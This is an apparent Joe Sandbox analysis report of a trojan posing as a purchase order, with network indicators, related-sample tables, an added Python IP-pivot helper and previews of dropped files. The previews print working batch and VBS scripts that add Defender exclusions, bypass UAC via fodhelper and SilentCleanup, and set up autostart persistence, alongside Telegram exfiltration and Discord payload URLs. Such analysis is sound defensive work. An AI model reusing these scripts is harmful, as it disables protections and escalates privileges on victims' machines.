                    https://api.ipify.orgGETMozilla/5.0 | 0% | URL Reputation | safe

                    Domains and IPs

                    Contacted Domains

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    discord.com | 162.159.128.233 | true | false | | unknown
                    cdn.discordapp.com | 162.159.135.233 | true | false | | high

                      URLs from Memory and Binaries

                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://127.0.0.1:HTTP/1.1 | New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
                      http://DynDns.comDynDNS | New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                      https://cdn.discordapp.com/attachments/781759014248775694/781759240837791774/Evvured | Evvudrv.exe, 00000012.00000002.921664541.0000000002FE0000.00000004.00000001.sdmp | false | | high
                      https://discord.com/ | Evvudrv.exe, 00000012.00000002.921664541.0000000002FE0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                      http://hltGXE.com | New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                      https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x | New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp | false | | high
                      https://discord.com/J | Evvudrv.exe, 00000012.00000002.921664541.0000000002FE0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                      https://api.ipify.orgGETMozilla/5.0 | New Order PO20011046.exe, 0000000B.00000002.920637120.00000000028E1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                          Contacted IPs


                          Public

                          IP | Domain | Country | ASN | ASN Name | Malicious
                          162.159.136.232 | unknown | United States | 13335 | CLOUDFLARENETUS | false
                          162.159.130.233 | unknown | United States | 13335 | CLOUDFLARENETUS | false
                          162.159.128.233 | unknown | United States | 13335 | CLOUDFLARENETUS | false
                          162.159.135.233 | unknown | United States | 13335 | CLOUDFLARENETUS | false

                          General Information

                          Joe Sandbox Version: 31.0.0 Red Diamond
                          Analysis ID: 324078
                          Start date: 28.11.2020
                          Start time: 10:26:47
                          Joe Sandbox Product: CloudBasic
                          Overall analysis duration: 0h 12m 40s
                          Hypervisor based Inspection enabled: false
                          Report type: light
                          Sample file name: New Order PO20011046.exe
                          Cookbook file name: default.jbs
                          Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of new started processes analysed: 22
                          Number of new started drivers analysed: 0
                          Number of existing processes analysed: 0
                          Number of existing drivers analysed: 0
                          Number of injected processes analysed: 0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode: default
                          Analysis stop reason: Timeout
                          Detection: MAL
                          Classification: mal100.troj.evad.winEXE@15/7@6/4
                          EGA Information: Failed
                          HDC Information:
                          • Successful, ratio: 56.3% (good quality ratio 54.9%)
                          • Quality average: 85.6%
                          • Quality standard deviation: 23.6%
                          HCA Information:
                          • Successful, ratio: 96%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .exe
                          Warnings:
                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                          • TCP Packets have been reduced to 100
                          • Excluded IPs from analysis (whitelisted): 13.64.90.137, 51.104.144.132, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 52.155.217.156, 20.54.26.129, 51.104.146.109
                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          Time | Type | Description
                          10:27:37 | API Interceptor | 334x Sleep call for process: New Order PO20011046.exe modified
                          10:28:27 | API Interceptor | 1x Sleep call for process: svchost.exe modified
                          10:28:27 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Evvu C:\Users\user\AppData\Local\uvvE.url
                          10:28:35 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Evvu C:\Users\user\AppData\Local\uvvE.url
                          10:28:36 | API Interceptor | 4x Sleep call for process: Evvudrv.exe modified

                          Joe Sandbox View / Context

                          IPs

                          Match | Associated Sample Name / URL | Detection
                          162.159.136.232 | 11-27.exe | malicious
                          162.159.136.232 | STATEMENT OF ACCOUNT.exe | malicious
                          162.159.136.232 | XcOxlmOz4D.exe | malicious
                          162.159.136.232 | fAhW3JEGaZ.exe | malicious
                          162.159.136.232 | SpecificationX20202611.xlsx | malicious
                          162.159.136.232 | RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe | malicious
                          162.159.136.232 | tzjEwwwbqK.exe | malicious
                          162.159.136.232 | New Microsoft Office Excel Worksheet.xlsx | malicious
                          162.159.136.232 | USD67,884.08_Payment_Advise_9083008849.exe | malicious
                          162.159.136.232 | USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE | malicious
                          162.159.136.232 | NyUnwsFSCa.exe | malicious
                          162.159.136.232 | PO#0007507_009389283882873PDF.exe | malicious
                          162.159.136.232 | D6vy84I7rJ.exe | malicious
                          162.159.136.232 | LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exe | malicious
                          162.159.136.232 | QgwtAnenic.exe | malicious
                          162.159.136.232 | qclepSi8m5.exe | malicious
                          162.159.136.232 | 99GQMirv2r.exe | malicious
                          162.159.136.232 | 7w6Yl263sM.exe | malicious
                          162.159.136.232 | 8Ce3uRUjxv.exe | malicious
                          162.159.136.232 | 187QadygQl.exe | malicious
                          162.159.130.233 | 11-27.exe | malicious
                          162.159.130.233 | RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe | malicious
                          162.159.130.233 | Q21rQw2C4o.exe | malicious
                          162.159.130.233 | tzjEwwwbqK.exe | malicious
                          162.159.130.233 | DHL_Express_Consignment_Details.exe | malicious
                          162.159.130.233 | oUI0jQS8xQ.exe | malicious
                          162.159.130.233 | d6pj421rXA.exe | malicious
                          162.159.130.233 | Order_Request_Retail_20-11691-AB.xlsx | malicious
                          162.159.130.233 | RBBD5vivZc.exe | malicious
                          162.159.130.233 | SecuriteInfo.com.Trojan.Siggen10.63473.17852.exe | malicious
                          162.159.130.233 | IMG_P_O_RFQ-WSB_17025-ENd User-Evaluate.exe | malicious
                          162.159.130.233 | GuYXnzIH45.exe | malicious
                          162.159.130.233 | Jvdivmn_Signed_.exe | malicious
                          162.159.130.233 | Dell ordine-09362-9-11-2020.exe | malicious
                          162.159.130.233 | Factura.exe | malicious
                          162.159.130.233 | 4XqxRwCQi7.exe | malicious
                          162.159.130.233 | RuntimeB.exe | malicious
                          162.159.130.233 | Runtime Broker.exe | malicious
                          162.159.130.233 | RYnBavdgiB.exe | malicious
                          162.159.130.233 | Ever Rose Order Specification REF-987NDH.exe | malicious

Domains

Match | Associated Sample Name / URL | Detection | Context
discord.com | 11-27.exe | malicious | 162.159.136.232
discord.com | STATEMENT OF ACCOUNT.exe | malicious | 162.159.128.233
discord.com | XcOxlmOz4D.exe | malicious | 162.159.136.232
discord.com | fAhW3JEGaZ.exe | malicious | 162.159.136.232
discord.com | HIp08HPg20.exe | malicious | 162.159.128.233
discord.com | MT103---USD42880.45---20201127--dbs--9900.exe | malicious | 162.159.137.232
discord.com | caw.exe | malicious | 162.159.138.232
discord.com | lxpo.exe | malicious | 162.159.128.233
discord.com | SpecificationX20202611.xlsx | malicious | 162.159.136.232
discord.com | RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe | malicious | 162.159.137.232
discord.com | Scan 25112020 pdf.exe | malicious | 162.159.137.232
discord.com | Piraeus Bank_swift_.exe | malicious | 162.159.128.233
discord.com | Q21rQw2C4o.exe | malicious | 162.159.137.232
discord.com | Q21rQw2C4o.exe | malicious | 162.159.128.233
discord.com | tzjEwwwbqK.exe | malicious | 162.159.136.232
discord.com | DHL_Express_Consignment_Details.exe | malicious | 162.159.138.232
discord.com | New Microsoft Office Excel Worksheet.xlsx | malicious | 162.159.136.232
discord.com | Komfkim_Signed_.exe | malicious | 162.159.135.232
discord.com | oUI0jQS8xQ.exe | malicious | 162.159.137.232
discord.com | USD67,884.08_Payment_Advise_9083008849.exe | malicious | 162.159.136.232
cdn.discordapp.com | PRO FORMA INVOICE - - MAGAUTKCP (24-Nov-20).exe | malicious | 162.159.135.233
cdn.discordapp.com | 11-27.exe | malicious | 162.159.129.233
cdn.discordapp.com | STATEMENT OF ACCOUNT.exe | malicious | 162.159.129.233
cdn.discordapp.com | OVERDUE INVOICE.xls | malicious | 162.159.129.233
cdn.discordapp.com | MT103---USD42880.45---20201127--dbs--9900.exe | malicious | 162.159.129.233
cdn.discordapp.com | Vessel details.doc | malicious | 162.159.135.233
cdn.discordapp.com | RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe | malicious | 162.159.130.233
cdn.discordapp.com | Scan 25112020 pdf.exe | malicious | 162.159.135.233
cdn.discordapp.com | Piraeus Bank_swift_.exe | malicious | 162.159.129.233
cdn.discordapp.com | Q21rQw2C4o.exe | malicious | 162.159.130.233
cdn.discordapp.com | Q21rQw2C4o.exe | malicious | 162.159.133.233
cdn.discordapp.com | tzjEwwwbqK.exe | malicious | 162.159.130.233
cdn.discordapp.com | DHL_Express_Consignment_Details.exe | malicious | 162.159.133.233
cdn.discordapp.com | New Microsoft Office Excel Worksheet.xlsx | malicious | 162.159.129.233
cdn.discordapp.com | INV SF2910202.doc | malicious | 162.159.135.233
cdn.discordapp.com | Komfkim_Signed_.exe | malicious | 162.159.129.233
cdn.discordapp.com | oUI0jQS8xQ.exe | malicious | 162.159.130.233
cdn.discordapp.com | USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXE | malicious | 162.159.135.233
cdn.discordapp.com | NyUnwsFSCa.exe | malicious | 162.159.133.233
cdn.discordapp.com | 1099008FEDEX_090887766.xls | malicious | 162.159.129.233

ASN

Match | Associated Sample Name / URL | Detection | Context
CLOUDFLARENETUS | PRO FORMA INVOICE - - MAGAUTKCP (24-Nov-20).exe | malicious | 162.159.135.233
CLOUDFLARENETUS | 11-27.exe | malicious | 162.159.135.233
CLOUDFLARENETUS | STATEMENT OF ACCOUNT.exe | malicious | 162.159.135.233
CLOUDFLARENETUS | XcOxlmOz4D.exe | malicious | 162.159.136.232
CLOUDFLARENETUS | fAhW3JEGaZ.exe | malicious | 162.159.136.232
CLOUDFLARENETUS | HIp08HPg20.exe | malicious | 104.23.98.190
CLOUDFLARENETUS | case.8920.xls | malicious | 104.27.186.55
CLOUDFLARENETUS | case.8920.xls | malicious | 172.67.212.16
CLOUDFLARENETUS | OVERDUE INVOICE.xls | malicious | 172.67.143.180
CLOUDFLARENETUS | Venom.exe | malicious | 104.23.98.190
CLOUDFLARENETUS | PO348578.jar | malicious | 104.23.99.190
CLOUDFLARENETUS | MT103---USD42880.45---20201127--dbs--9900.exe | malicious | 162.159.129.233
CLOUDFLARENETUS | notif8372.xls | malicious | 104.24.117.11
CLOUDFLARENETUS | notif8372.xls | malicious | 172.67.222.45
CLOUDFLARENETUS | SecuriteInfo.com.Heur.23770.xls | malicious | 104.31.87.226
CLOUDFLARENETUS | 2020-11-27-ZLoader-DLL-example-01.dll | malicious | 172.67.155.205
CLOUDFLARENETUS | 2020-11-27-ZLoader-DLL-example-02.dll | malicious | 172.67.155.205
CLOUDFLARENETUS | 2020-11-27-ZLoader-DLL-example-03.dll | malicious | 104.27.143.240
CLOUDFLARENETUS | SecuriteInfo.com.Heur.23770.xls | malicious | 104.31.86.226
CLOUDFLARENETUS | Final_report_2020.html | malicious | 104.16.18.94
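The Domains and ASN tables above list other samples that shared an indicator with this one, each with the IP seen in that sample's run. The Python below is an added example, not part of the Joe Sandbox report, that parses rows in the flattened text form the report uses and pivots sample-to-IP in both directions. Every context IP in this section belongs to CLOUDFLARENETUS and fronts discord.com or cdn.discordapp.com, so two samples landing on the same address tells you little about a shared operator; the script therefore discounts addresses inside shared-CDN prefixes and only reports a relationship on an address outside them. The CDN prefixes, the helper names and the two constructed rows carrying 203.0.113.10 are assumptions for illustration, not data from the report.

```python
"""Pivot helper for sandbox 'Context' tables (added example, not part of the report).

The report lists, per matched domain / ASN / JA3 hash, other samples that shared the
indicator, each with the IP observed in that sample's run.  This script parses rows
in the flattened text form the report uses, builds sample<->IP pivots, and discounts
indicators that live in shared CDN / anycast space, where co-occurrence says little.
"""
import ipaddress
import re
from collections import defaultdict

# Row shape in the flattened report: "<sample>Get hash<detection>Browse" followed by
# one or more "• <ip>" context lines.  The first row of a group carries the match
# value (domain, ASN name, JA3 hash) as a prefix, so the caller passes it to strip.
ROW_RE = re.compile(r"^(?P<sample>.+?)Get hash(?P<detection>[A-Za-z]+)Browse$")
CTX_RE = re.compile(r"^•\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$")

# Assumed shared-CDN prefixes, for illustration only: the report attributes every
# context IP in this section to CLOUDFLARENETUS.  Pull the provider's current list
# before relying on this in production.
SHARED_CDN_PREFIXES = [
    ipaddress.ip_network("162.158.0.0/15"),
    ipaddress.ip_network("104.16.0.0/12"),
    ipaddress.ip_network("172.64.0.0/13"),
]


def parse_context_table(text, match_value):
    """Return a list of (sample, detection, [ips]) tuples for one match group."""
    rows = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith(match_value):
            line = line[len(match_value):]
        m = ROW_RE.match(line)
        if m:
            rows.append((m.group("sample"), m.group("detection"), []))
            continue
        c = CTX_RE.match(line)
        if c and rows:
            rows[-1][2].append(c.group("ip"))
    return rows


def is_shared_cdn(ip):
    """True when the address sits in one of the assumed shared-CDN prefixes."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SHARED_CDN_PREFIXES)


def pivot(rows):
    """Map every context IP to the samples that used it, split by pivot quality."""
    by_ip = defaultdict(set)
    for sample, _, ips in rows:
        for ip in ips:
            by_ip[ip].add(sample)
    strong = {ip: s for ip, s in by_ip.items() if not is_shared_cdn(ip)}
    weak = {ip: s for ip, s in by_ip.items() if is_shared_cdn(ip)}
    return strong, weak


def related_samples(rows, sample):
    """Samples sharing a non-CDN IP with `sample`; CDN-only overlap does not count."""
    strong, _ = pivot(rows)
    mine = {ip for s, _, ips in rows if s == sample for ip in ips}
    out = set()
    for ip in mine:
        out |= strong.get(ip, set())
    out.discard(sample)
    return sorted(out)


# Constructed input: four rows copied from the report's discord.com group, plus two
# rows with a non-CDN address (203.0.113.10, RFC 5737 test range) that do not appear
# in the report, added only so the strong-pivot path is exercised.
SAMPLE_TABLE = """\
discord.com11-27.exeGet hashmaliciousBrowse
• 162.159.136.232
STATEMENT OF ACCOUNT.exeGet hashmaliciousBrowse
• 162.159.128.233
XcOxlmOz4D.exeGet hashmaliciousBrowse
• 162.159.136.232
lxpo.exeGet hashmaliciousBrowse
• 162.159.128.233
constructed-a.exeGet hashmaliciousBrowse
• 203.0.113.10
constructed-b.exeGet hashmaliciousBrowse
• 203.0.113.10
• 162.159.136.232
"""

if __name__ == "__main__":
    rows = parse_context_table(SAMPLE_TABLE, "discord.com")
    strong, weak = pivot(rows)
    for ip, samples in sorted(weak.items()):
        print(f"weak   {ip:<16} {len(samples)} samples (shared CDN space)")
    for ip, samples in sorted(strong.items()):
        print(f"strong {ip:<16} {sorted(samples)}")
    print("related to 11-27.exe:", related_samples(rows, "11-27.exe"))
    print("related to constructed-a.exe:", related_samples(rows, "constructed-a.exe"))
```

Run as-is to see the split: the two 162.159.x.x addresses come out as weak pivots shared by several samples, while only the constructed 203.0.113.10 pair produces a relationship. The same parser works for the JA3 group below if the hash is passed as `match_value`, but a JA3 hash identifies a client TLS stack rather than an operator, so treat it as a weak pivot in the same way.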

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
ce5f3254611a8c095a3d821d44539877 | PRO FORMA INVOICE - - MAGAUTKCP (24-Nov-20).exe | malicious | 162.159.135.233, 162.159.130.233
ce5f3254611a8c095a3d821d44539877 | 11-27.exe | malicious | 162.159.135.233, 162.159.130.233
ce5f3254611a8c095a3d821d44539877 | STATEMENT OF ACCOUNT.exe | malicious | 162.159.135.233, 162.159.130.233
ce5f3254611a8c095a3d821d44539877 | caw.exe | malicious | 162.159.135.233, 162.159.130.233
ce5f3254611a8c095a3d821d44539877 | 6znqz0d1.dll | malicious | 162.159.135.233, 162.159.130.233
ce5f3254611a8c095a3d821d44539877 | INV-FATURA010009.xlsx | malicious | 162.159.135.233, 162.159.130.233
ce5f3254611a8c095a3d821d44539877 | INV-FATURA010009.xlsx | malicious | 162.159.135.233, 162.159.130.233
ce5f3254611a8c095a3d821d44539877 | 2zv940v7.dll | malicious | 162.159.135.233, 162.159.130.233
ce5f3254611a8c095a3d821d44539877 | RFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe | malicious | 162.159.135.233, 162.159.130.233
ce5f3254611a8c095a3d821d44539877 | Izezma64.dll | malicious | 162.159.135.233, 162.159.130.233
ce5f3254611a8c095a3d821d44539877 | fuxenm32.dll | malicious | 162.159.135.233, 162.159.130.233
ce5f3254611a8c095a3d821d44539877 | api-cdef.dll | malicious | 162.159.135.233, 162.159.130.233
ce5f3254611a8c095a3d821d44539877 | Scan 25112020 pdf.exe | malicious | 162.159.135.233, 162.159.130.233
ce5f3254611a8c095a3d821d44539877 | tarifvertrag_igbce_weihnachtsgeld_k#U00fcndigung.js | malicious | 162.159.135.233, 162.159.130.233
ce5f3254611a8c095a3d821d44539877 | tarifvertrag_igbce_weihnachtsgeld_k#U00fcndigung.js | malicious | 162.159.135.233, 162.159.130.233
ce5f3254611a8c095a3d821d44539877 | Piraeus Bank_swift_.exe | malicious | 162.159.135.233, 162.159.130.233
ce5f3254611a8c095a3d821d44539877 | FxzOwcXb7x.exe | malicious |
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          Izipubob.dllGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          nivude1.dllGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233
                                                                                                          Accesshover.dllGet hashmaliciousBrowse
                                                                                                          • 162.159.135.233
                                                                                                          • 162.159.130.233

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\Public\Xzqvp.bat
                                                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):86
                                                                                                          Entropy (8bit):4.565344987058984
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:pFEjDaHF598TULLvBRVPjDaHF598TULLvBRy:pFEPaHhdLbnVPPaHhdLbny
                                                                                                          MD5:7FD082AAA613DEE2AC4DFE43AA568452
                                                                                                          SHA1:24C764D19008C8E6E0EA2B92D26D5A7EEDA39A3B
                                                                                                          SHA-256:45CF90DB799654A9E3BA1CB487E2169FFBE28E73D0EDDBF7453C25125FEC979C
                                                                                                          SHA-512:566986F5B9FD898101491C2649F242A5DEEC6A3D4E2F4F5A2761DBAFABF10733F7933C78CBBAFF5FEDCC302F5CF7E91BEA2CB3E7B6FEE05F4CA32C013B2B53B0
                                                                                                          Malicious:false
                                                                                                          Preview: cmd /c C:\Users\Public\Xzqvpcvb.vbs..exit..cmd /c C:\Users\Public\Xzqvpcvb.vbs..exit..
                                                                                                          C:\Users\Public\Xzqvpcvb.vbs
                                                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):530
                                                                                                          Entropy (8bit):4.98731455850251
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:fDNZcAqSPK+uSLKMPncwWkqcgpDNZcAqSPK+uSLKMPncwWkqcg5:fDN2AqsOM/NWkqcgpDN2AqsOM/NWkqck
                                                                                                          MD5:6FFC5D3B2EEA8DE8E112C11EF172C202
                                                                                                          SHA1:08928DAAD7F51C719F21753FA77ECD2E22438A1F
                                                                                                          SHA-256:1DA88FA21B51E47D5EBAB7004DB14CD825646545A22BB8E4B9137910060FFDA2
                                                                                                          SHA-512:3D7E63D15446E248188889951B3AA7BAC1CB45FCDB2FFA4533FDBD3F820607F2B190E6AA0C321D71D71BC1DEE8A661E5C74BECD356AFD6B2EE5B4ACF772A3C5A
                                                                                                          Malicious:false
                                                                                                          Preview: dim FSO, objShell, strApp..set FSO = CreateObject("Scripting.FileSystemObject")..set objShell = CreateObject("Wscript.Shell")..path = "C:\Users\Public\Xzqvphcc.bat"..if FSO.FileExists(path) then..objShell.Run path, 0, false..Set objShellSh = Nothing..else..end if..dim FSO, objShell, strApp..set FSO = CreateObject("Scripting.FileSystemObject")..set objShell = CreateObject("Wscript.Shell")..path = "C:\Users\Public\Xzqvphcc.bat"..if FSO.FileExists(path) then..objShell.Run path, 0, false..Set objShellSh = Nothing..else..end if..
                                                                                                          C:\Users\Public\Xzqvphcc.bat
                                                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):590
                                                                                                          Entropy (8bit):4.692054461517121
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:s8MeMQ7huqfDutOoN98MeMQ7huqfDutOoa:We/9uqfDutOqDe/9uqfDutOh
                                                                                                          MD5:A94C89BF90B24D3CE502FFA49B083A0E
                                                                                                          SHA1:CDD29B18E578429246C7482EA23EBBF53DBBF499
                                                                                                          SHA-256:48B9A3DCD7D1670772C2BD085CC0588D9A5B8529F602F5B6055DE9327C52CCD9
                                                                                                          SHA-512:D0E1BF66A95E2DA8C68C409D90E7134CE224B01D5894069BE24DD27BA7FC5F4A4D5BF3E254F5D702EE919D4AE86205409A42D6151BE50A88E785E0C4E05A906A
                                                                                                          Malicious:false
                                                                                                          Preview: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local ..del /q "C:\Windows \System32\*"..rmdir "C:\Windows \System32"..rmdir "C:\Windows \"..mkdir "C:\Windows\Finex"..exit..powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local ..del /q "C:\Windows \System32\*"..rmdir "C:\Windows \System32"..rmdir "C:\Windows \"..mkdir "C:\Windows\Finex"..exit..
                                                                                                          C:\Users\Public\Xzqvptso.bat
                                                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                          File Type:ASCII text, with CRLF, LF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):673
                                                                                                          Entropy (8bit):5.055242933466055
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:rgaX0WMYaXe1uOeV9gaXsbbyid1e4ziLpVmWEM3/jEb6dTD1Mn:rnX0dvXrOeV9nXsCIE4eTMTsSn
                                                                                                          MD5:F30EA4775996A873C0AD2C14679C9D97
                                                                                                          SHA1:05955BE0B5BE66FC7E1F582CD572EECC6E238C6F
                                                                                                          SHA-256:31F4287BD7007AF20FCE126ABD7D4AEA174C51DB2DE09D7F8A41AFED510689B5
                                                                                                          SHA-512:28BA7D44BAEF419B6831B47F0705B2E3966FB54808B050A2F802E5A857A0E6AA3CB34A627080758E1E40722188BD6D78AAD65A66CCE14FEB2693580D344BE924
                                                                                                          Malicious:false
                                                                                                          Preview: reg delete hkcu\Environment /v windir /f ..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I..reg delete hkcu\Environment /v windir /f REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f.REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f.fodhelper.exe.cmd /c start /min C:\Users\Public\x.bat
                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Evvudrv.exe
                                                                                                          Process:C:\Users\user\Desktop\New Order PO20011046.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1311424
                                                                                                          Entropy (8bit):7.189657105883589
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:FiLDfJXRq+fowpGG7By3Z72mwq8gKmX9hIbEIKn:FiLr5By3Z7NWgKAj
                                                                                                          MD5:310A7CA550B9997D0E0BCAF645530303
                                                                                                          SHA1:5617D1E233381EA3FD6AB796FCC6A2DE66137C51
                                                                                                          SHA-256:0EE90C988386390753A1954692A658E393D761887ECFBFD100105C365A3EBC34
                                                                                                          SHA-512:C6D438F7CCAEC0DCB5F64CBF50B05AF909366EA30C15C15C38CD1ABBAF02E7228A26C36781E140841DAA79C138BD0C63DEF9AB769EE40C2525A6A950B1107175
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 69%
                                                                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................0...................@...........................0...".......................T......8............................p......................................................CODE....|........................... ..`DATA....T).......*..................@...BSS.....M................................idata..."...0...$..................@....tls.........`...........................rdata.......p......................@..P.reloc..8...........................@..P.rsrc...............................@..P.............0......................@..P........................................................................................................................................
                                                                                                          C:\Users\user\AppData\Local\uvvE.url
                                                                                                          Process:C:\Users\user\Desktop\New Order PO20011046.exe
                                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Evvudrv.exe>), ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):169
                                                                                                          Entropy (8bit):5.15339576531091
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:HRAbABGQYmHmEX+Ro6p4EkD5oef5yaKYTvQJ5ontCBuXV9k/qIH19Yxv:HRYFVmcKaJkDlR9NvQJ5OtZF9k/qI72v
                                                                                                          MD5:B0A940253E10E504ECD095FED46C0E83
                                                                                                          SHA1:683B39147B3ACE175BE29D6F8FBFB5B8F85D65B0
                                                                                                          SHA-256:4071F88611A9C05F83FF964309BB8F5DCF56E07DFB40388D732D47EF842A91DE
                                                                                                          SHA-512:4FCABD03392A263476576525A479B9861B20D396C73108B8C4BA001FC2DE7C0775ACD845A6D6D602D6D8EB348EFB87FEE765230745C6D76F73993019AE65B166
                                                                                                          Malicious:false
                                                                                                          Yara Hits:
                                                                                                          • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\uvvE.url, Author: @itsreallynick (Nick Carr)
                                                                                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\uvvE.url, Author: @itsreallynick (Nick Carr)
                                                                                                          • Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\uvvE.url, Author: @itsreallynick (Nick Carr)
                                                                                                          Preview: [InternetShortcut]..URL=file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Evvudrv.exe..IconIndex=1..IconFile=.url..Modified=20F06BA06D07BD014D..HotKey=1601..
                                                                                                          C:\Windows\assembly\Desktop.ini
                                                                                                          Process:C:\Users\user\Desktop\New Order PO20011046.exe
                                                                                                          File Type:Windows desktop.ini, ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):227
                                                                                                          Entropy (8bit):5.2735028737400205
                                                                                                          Encrypted:false
